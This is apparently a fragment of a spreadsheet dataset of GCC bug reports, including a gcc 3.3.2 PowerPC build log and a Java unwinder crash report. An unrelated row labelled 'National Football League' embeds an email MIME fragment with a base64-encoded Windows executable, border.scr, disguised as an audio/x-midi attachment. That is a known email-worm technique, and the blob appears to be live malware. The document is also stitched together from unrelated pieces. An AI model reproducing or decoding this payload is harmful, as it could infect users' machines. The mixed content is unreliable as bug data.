/home/toolchain/gcc-3_3-branch/libstdc++-v3/libsupc++/del_op.cc  -fPIC -DPIC -o del_op.o --save-temps -v 
Reading specs from /home/toolchain/obj33/obj-gcc/gcc/specs
Configured with: /home/toolchain/gcc-3_3-branch/configure --prefix=/home/toolchain/gcc33 --enable-languages=cc++ --enable-version-specific-runtime-libs --disable-nls
Thread model: posix
gcc version 3.3.2 20031004 (prerelease)
 /home/toolchain/obj33/obj-gcc/gcc/cc1plus -E -D__GNUG__=3 -quiet -nostdinc++ -v -I/home/toolchain/gcc-3_3-branch/libstdc++-v3/../gcc -I/home/toolchain/gcc-3_3-branch/libstdc++-v3/../include -I/home/toolchain/obj33/obj-gcc/powerpc-unknown-linux-gnu/nof/libstdc++-v3/include/powerpc-unknown-linux-gnu -I/home/toolchain/obj33/obj-gcc/powerpc-unknown-linux-gnu/nof/libstdc++-v3/include -I/home/toolchain/gcc-3_3-branch/libstdc++-v3/libsupc++ -iprefix /home/toolchain/obj33/obj-gcc/gcc/../lib/gcc-lib/powerpc-unknown-linux-gnu/3.3.2/ -isystem /home/toolchain/obj33/obj-gcc/gcc/include -isystem /home/toolchain/gcc33/powerpc-unknown-linux-gnu/bin/include -isystem /home/toolchain/gcc33/powerpc-unknown-linux-gnu/lib/include -D__GNUC__=3 -D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=2 -D_GNU_SOURCE -D__PIC__=2 -D__pic__=2 -D__unix__ -D__gnu_linux__ -D__linux__ -Dunix -D__unix -Dlinux -D__linux -Asystem=unix -Asystem=posix -D_GNU_SOURCE -DPIC -isystem /home/toolchain/gcc33/powerpc-unknown-linux-gnu/include /home/toolchain/gcc-3_3-branch/libstdc++-v3/libsupc++/del_op.cc -msoft-float -mstrict-align -msoft-float -mstrict-align -Wall -Wall -Wno-format -W -Wwrite-strings -fPIC -fsigned-char -fmessage-length=0 -fPIC -fno-implicit-templates -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -fPIC -O1 del_op.ii
ignoring nonexistent directory /home/toolchain/gcc33/powerpc-unknown-linux-gnu/bin/include
ignoring nonexistent directory /home/toolchain/gcc33/powerpc-unknown-linux-gnu/lib/include
ignoring nonexistent directory /home/toolchain/gcc33/powerpc-unknown-linux-gnu/include
ignoring nonexistent directory /home/toolchain/obj33/obj-gcc/lib/gcc-lib/powerpc-unknown-linux-gnu/3.3.2/include
ignoring nonexistent directory /home/toolchain/obj33/obj-gcc/lib/gcc-lib/powerpc-unknown-linux-gnu/3.3.2/../../../../powerpc-unknown-linux-gnu/include
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /home/toolchain/gcc33/powerpc-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /home/toolchain/gcc-3_3-branch/gcc
 /home/toolchain/gcc-3_3-branch/include
 /home/toolchain/obj33/obj-gcc/powerpc-unknown-linux-gnu/nof/libstdc++-v3/include/powerpc-unknown-linux-gnu
 /home/toolchain/obj33/obj-gcc/powerpc-unknown-linux-gnu/nof/libstdc++-v3/include
 /home/toolchain/gcc-3_3-branch/libstdc++-v3/libsupc++
 /home/toolchain/obj33/obj-gcc/gcc/include
 /home/toolchain/gcc33/include
 /home/toolchain/gcc33/lib/gcc-lib/powerpc-unknown-linux-gnu/3.3.2/include
 /usr/include
End of search list.
 /home/toolchain/obj33/obj-gcc/gcc/cc1plus -fpreprocessed del_op.ii -quiet -dumpbase del_op.cc -msoft-float -mstrict-align -msoft-float -mstrict-align -auxbase-strip del_op.o -g -O1 -Wall -Wall -Wno-format -W -Wwrite-strings -version -fPIC -fsigned-char -fmessage-length=0 -fPIC -fno-implicit-templates -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -fPIC -o del_op.s
GNU C++ version 3.3.2 20031004 (prerelease) (powerpc-unknown-linux-gnu)
        compiled by GNU C version 3.3.2 20031004 (prerelease).
GGC heuristics: --param ggc-min-expand=72 --param ggc-min-heapsize=80369
 /home/toolchain/gcc33/powerpc-unknown-linux-gnu/bin/as -mppc -V -Qy -K PIC -o del_op.o del_op.s
GNU assembler version 2.14.90 (powerpc-unknown-linux-gnu) using BFD version 2.14.90 20031004
del_op.s: Assembler messages:
del_op.s:13: Warning: setting incorrect section attributes for .text._ZdlPv
toolchain:~ $ grep -C2 .text._ZdlPv del_op.s
        .file 2 /home/toolchain/obj33/obj-gcc/gcc/include/stddef.h
        .file 3 /home/toolchain/gcc-3_3-branch/libstdc++-v3/libsupc++/new
        .section        .text._ZdlPvawx@progbits
        .align 2
        .globl _ZdlPv
o-ton Modra:
 heh writable text section.  bug in gcc
&gt; 3.3.2 blocker?
 yeah i'd say so.  this was current gcc-3.3 branch ie. without any other patches?</t>
  </si>
  <si>
    <t>GCC-21906</t>
  </si>
  <si>
    <t>hang when invoking abstract method</t>
  </si>
  <si>
    <t>Try the test case abstract.fail.abstract2 from the mauve
verify module.  (You will need jasmin to build this.)
This test case gets a SEGV in the unwinder:
Program received signal SIGSEGV Segmentation fault.
uw_frame_state_for (context=0xbfff9998 fs=0xbfff98d8) at linux-unwind.h:125
125	in linux-unwind.h
Continuing results in the same SEGV endlessly.
The underlying cause of this is that a _Jv_Method has 0x0 as its
'ncode'.  Instead it would be more correct to put
'throw new AbstractMethodError' there.  I have a partial patch
to do this (the compiler should also do this...).
However I think the unwinder crashing is a bug regardless of whether
this other problem is fixed.</t>
  </si>
  <si>
    <t>GCC-9490</t>
  </si>
  <si>
    <t>National Football League</t>
  </si>
  <si>
    <t xml:space="preserve"> --ZRCed58JW92Ig179z6TE
 Content-Type: text/html
 Content-Transfer-Encoding: quoted-printable
 --ZRCed58JW92Ig179z6TE
 Content-Type: audio/x-midi
 	name=border.scr
 Content-Transfer-Encoding: base64
 Content-ID: 
 TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
 RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn
 GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA
 UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA
 QAAAEAAAABAAAAQAAAAAAAAABAAAAAAAAAAAYAkAABAAAAAAAAACAAAAAAAQAAAQAAAAABAA
 ABAAAAAAAAAQAAAAAAAAAAAAAAAg1gAAZAAAAABQCQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 ANAAAOwBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAEq6AAAAEAAAAMAAAAAQ
 AAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAiEAAAANAAAAAgAAAA0AAAAAAAAAAAAAAAAAAA
 QAAAQC5kYXRhAAAAbF4IAADwAAAAUAAAAPAAAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAABAA
 AAAAUAkAEAAAAABAAQAAAAAAAAAAAAAAAABAAAB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FWL7IPsFItF
 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
